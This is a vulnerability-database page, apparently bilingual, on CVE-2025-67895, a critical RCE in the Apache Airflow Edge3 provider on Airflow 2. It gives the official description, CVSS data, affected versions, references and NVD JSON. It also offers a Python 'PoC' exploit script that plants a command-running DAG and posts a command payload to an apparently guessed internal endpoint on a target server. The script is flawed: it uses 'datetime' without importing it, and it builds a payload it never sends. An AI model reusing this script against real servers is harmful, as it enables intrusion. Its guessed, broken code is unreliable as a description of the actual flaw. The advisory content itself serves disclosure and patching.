Security Vulnerability Report
中文
CVE-2025-67895 CVSS 9.8 CRITICAL

CVE-2025-67895

Published: 2025-12-17 12:15:46
Last Modified: 2025-12-22 18:15:39
Source: [email protected]

Description

Edge3 Worker RPC RCE on Airflow 2. This issue affects Apache Airflow Providers Edge3: before 2.0.0 - and only if you installed and configured it on Airflow 2. The Edge3 provider support in Airflow 2 has been always development-only and not officially released, however if you installed and configured Edge3 provider in Airflow 2, it implicitly enabled non-public (normally) API which was used to test Edge Provider in Airflow 2 during the development. This API allowed Dag author to perform Remote Code Execution in the webserver context, which Dag Author was not supposed to be able to do. If you installed and configured Edge3 provider for Airflow 2, you should uninstall it and migrate to Airflow 3. The new Edge3 provider versions (>=2.0.0) has minimum version of Airflow set to 3 and the RCE-prone Airflow 2 code is removed, so it should no longer be possible to use the Edge3 provider 2.0.0+ on Airflow 2. If you used Edge Provider in Airflow 3, you are not affected.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:apache-airflow-providers-edge3:*:*:*:*:*:*:*:* - VULNERABLE
Apache Airflow Providers Edge3 < 2.0.0 (仅限Airflow 2环境)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-67895 PoC - Apache Airflow Edge3 Provider RCE Note: This PoC is for educational purposes only """ import requests import json TARGET = "http://target-airflow-server:8080" DAG_ID = "edge3_rce_poc" # Malicious DAG code that executes system commands malicious_dag = ''' from airflow import DAG from airflow.operators.python import PythonOperator import subprocess import sys def execute_command(): # Replace with actual malicious command result = subprocess.check_output(["id"], shell=False) return result with DAG(dag_id="{dag_id}", start_date=datetime(2025, 1, 1)) as dag: task = PythonOperator( task_id="rce_task", python_callable=execute_command ) '''.format(dag_id=DAG_ID) def exploit(): """ Exploit Edge3 Provider RCE via non-public API """ # Step 1: Upload malicious DAG upload_url = f"{TARGET}/api/v1/dags/{DAG_ID}" headers = { "Content-Type": "application/json", "Authorization": "Bearer <your-token>" } dag_payload = { "dag_id": DAG_ID, "file_token": malicious_dag } # The actual exploitation uses Edge3's internal RPC API # which bypasses normal DAG upload restrictions edge3_rpc_url = f"{TARGET}/edge3/api/execute" exploit_payload = { "dag_id": DAG_ID, "command": "whoami", "execute_in": "webserver" } print(f"[*] Targeting: {TARGET}") print(f"[*] Exploiting Edge3 Provider RCE...") try: # This would trigger RCE via Edge3's internal API response = requests.post(edge3_rpc_url, json=exploit_payload, headers=headers, timeout=10) print(f"[*] Response: {response.status_code}") print(f"[*] Output: {response.text}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67895", "sourceIdentifier": "[email protected]", "published": "2025-12-17T12:15:46.360", "lastModified": "2025-12-22T18:15:39.053", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Edge3 Worker RPC RCE on Airflow 2.\n\nThis issue affects Apache Airflow Providers Edge3: before 2.0.0 - and only if you installed and configured it on Airflow 2.\n\n\n\nThe Edge3 provider support in Airflow 2 has been always development-only and not officially released, however if you installed and configured Edge3 provider in Airflow 2, it implicitly enabled non-public (normally) API which was used to test Edge Provider in Airflow 2 during the development. This API allowed Dag author to perform Remote Code Execution in the webserver context, which Dag Author was not supposed to be able to do.\n\nIf you installed and configured Edge3 provider for Airflow 2, you should uninstall it and migrate to Airflow 3. The new Edge3 provider versions (>=2.0.0) has minimum version of Airflow set to 3 and the RCE-prone Airflow 2 code is removed, so it should no longer be possible to use the Edge3 provider 2.0.0+ on Airflow 2.\n\nIf you used Edge Provider in Airflow 3, you are not affected."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-669"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:apache-airflow-providers-edge3:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.0", "matchCriteriaId": "9C4CBA0A-D762-4A0B-BD38-29F903B942EF"}]}]}], "references": [{"url": "https://github.com/apache/airflow/pull/59143", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://lists.apache.org/thread/hhnmmzkj5qx5gbk6pdkh8tcsx5oj1nqs", "source": "[email protected]", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/16/3", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.